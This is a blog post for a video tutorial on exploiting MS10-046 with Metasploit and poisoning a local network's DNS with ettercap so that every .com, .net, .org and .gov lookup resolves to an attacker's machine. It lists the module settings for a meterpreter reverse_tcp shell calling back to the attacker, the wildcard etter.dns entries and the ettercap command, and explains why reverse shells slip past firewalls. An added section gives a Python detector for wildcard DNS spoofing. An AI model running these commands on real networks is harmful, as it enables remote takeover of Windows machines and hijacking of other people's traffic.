Ok, so this is my first attempt at a video tutorial. In it I perform the MS10-046 exploit in the Metasploit framework, then use ettercap to poison DNS on my network so that all HTTP traffic is redirected to a malicious IP. I got nervous and messed up a few explanations, so I'm going to explain them here after you view the embedded YouTube video in all its glory! (PS: watch it in 720p, you can't quite see the commands otherwise.)
Ok, so, a few things:
reverse_tcp does not open a listening "server" or socket on the victim box; it creates the listening socket on your attacker machine and directs the victim box to connect back to your LHOST setting. I misspoke (like I said, I was nervous, first video, etc.). bind_tcp is the one that opens a listening socket on the victim machine, which you then connect to.
The reason we want a reverse_tcp payload when the victim PC is running Windows Firewall (or any firewall) is that firewalls normally won't let just any old traffic in, but will let most traffic out. With bind_tcp, the victim box acts as the server and our attacking box acts as the client, so the connection is inbound to the victim, and that is where the problem shows up. With reverse_tcp, our attacking box acts as the server and the victim acts as the client, so from the victim's side the connection is outbound.
“hackme-some random numbers, this must be the UID” No, it is not the UID, they are just some random numbers I assigned the VM when I made it. I don’t know why I said this.
Now we’re past that, here are the main commands I used:
Metasploit (MS10-046 module setup):
set SRVHOST ATTACKER_IP_ADDR
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST ATTACKER_IP_ADDR
ettercap dns_spoof entries (these go in etter.dns):
*.com A 192.168.217.133
*.net A 192.168.217.133
*.org A 192.168.217.133
*.gov A 192.168.217.133
ettercap:
ettercap -T -q -i eth0 -P dns_spoof // //
MSF post exploitation:
sessions -i 1
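As an added defensive example (not from the video or its author): the wildcard entries above make every public .com/.net/.org/.gov name on the LAN resolve to one private address, which a legitimate resolver never does. The check below, run over constructed resolver-log lines in a made-up "client qname A answer" format, flags that pattern.

```python
import re
from collections import defaultdict

# Constructed sample of resolver answer logs (not captured from the video).
# Each line: "<client_ip> <qname> A <answer_ip>". Under a dns_spoof wildcard
# every public lookup collapses to the same LAN host.
SAMPLE_LOG = """\
192.168.217.10 www.google.com A 192.168.217.133
192.168.217.10 mail.yahoo.com A 192.168.217.133
192.168.217.10 www.wikipedia.org A 192.168.217.133
192.168.217.10 www.irs.gov A 192.168.217.133
192.168.217.10 update.microsoft.com A 192.168.217.133
192.168.217.11 www.example.net A 93.184.216.34
192.168.217.11 intranet.corp.local A 192.168.217.5
"""

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+A\s+(\S+)$")
PUBLIC_TLDS = {"com", "net", "org", "gov"}  # the TLDs the wildcard rules cover


def is_rfc1918(ip):
    """True for 10/8, 172.16/12 and 192.168/16 addresses."""
    a, b = (int(x) for x in ip.split(".")[:2])
    return a == 10 or (a == 172 and 16 <= b <= 31) or (a == 192 and b == 168)


def find_spoofed_answers(log_text, min_domains=3):
    """Return {answer_ip: sorted qnames} for private addresses handed back for
    at least `min_domains` distinct public-TLD names. Unrelated public names
    all resolving to one LAN host is the signature of a wildcard spoof."""
    by_answer = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip anything not in the expected format
        _client, qname, answer = m.groups()
        tld = qname.rsplit(".", 1)[-1].lower()
        if tld in PUBLIC_TLDS and is_rfc1918(answer):
            by_answer[answer].add(qname.lower())
    return {ip: sorted(names) for ip, names in by_answer.items()
            if len(names) >= min_domains}


if __name__ == "__main__":
    for ip, names in find_spoofed_answers(SAMPLE_LOG).items():
        print(f"possible DNS spoofing: {ip} answered for {len(names)} public names: {', '.join(names)}")
```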
I enjoyed making this video, so you may see some more. If you have any questions, feel free to comment on this post or email me: email@example.com
Direct video link: http://disillusion.us/videos/MS10-046.mp4